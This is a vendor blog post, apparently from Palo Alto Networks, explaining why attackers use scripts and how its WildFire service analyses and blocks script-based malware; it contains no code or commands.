Cyberattackers look for fast and easy ways to steal your data. Among many techniques in their playbooks, using scripts is a quickly growing trend. Why? because:
Scripts are easier to obfuscate than PE
Scripts are harder to detect based on file type and syntax (since a script is merely a text file)
Scripts will run across platforms (no need to recompile to windows 7, XP etc..)
Scripts are easier to generate (no compilation process simple text changes)
Script languages are easier to learn than programming languages
Scripting is an extremely useful toolset. It allows administrators and power users a way to automate repetitive tasks and multitask effectively. If you have ever opened Microsoft Office file, you have probably encountered “macros” which may execute VBScript. These tools help accelerate productivity, but can also be used for a darker purpose. Adversaries can leverage scripting languages to ingest and execute code, exploit vulnerabilities in the system, and potentially gain privileged access.
They are continuously finding clever new ways to hide these malicious scripts in seemingly safe content. For example, they can use password protected archive formats (.ZIP, .RAR), or embed them in commonly used Windows PE (executables) files and documents, successfully evading legacy sandboxing tools. In most cases, attackers use social engineering techniques to build emails to deliver the script that appears to be from a trusted source within the company, increasing the changes of an employee engaging with it.
How WildFire Protects
The Palo Alto Networks WildFire malware analysis service has added an innovative new detection technique to mitigate script-based attacks. When scripts are identified traversing the network, our Security Operating Platform immediately identifies and forward the files to WildFire for analysis and execution. In order to reveal even the most evasive advanced attacks, WildFire utilizes multiple techniques including static analysis and dynamic analysis to identify the true intent of the script. Once the verdict is determined, protections are shared with the global community within minutes, spreading immunity worldwide.
WildFire now supports the following scripts filetypes:
PowerShell Script (.ps1)
Shell Script (.sh)
POP3, SMTP, IMAP
For example, a user receives and executes a malicious script delivered via email. WildFire receives and analyzes the script, delivering domain signatures and URL recategorization to block the secondary malicious payloads. Here is a visual representation of the lifecycle:
The next step would be to determine the purpose and potentially targeted nature of this attack. Palo Alto Networks AutoFocus Threat Intelligence service provides rich context and attribution, you get instant access to billions of public samples and trillions of artifacts collected and processed by WildFire global infrastructure. Security analysts can quickly identify potential impact by combining Unit 42 human intelligence and automated analysis. As a result, you have fast access to the right data, be more proactive and respond to future script-based attacks faster.
The Palo Alto Networks Unit 42 threat research team has discovered and dissected several of adversary playbooks which include scripts at several stages of the attack lifecycle, providing insight into how adversaries are employing this technique in the real world: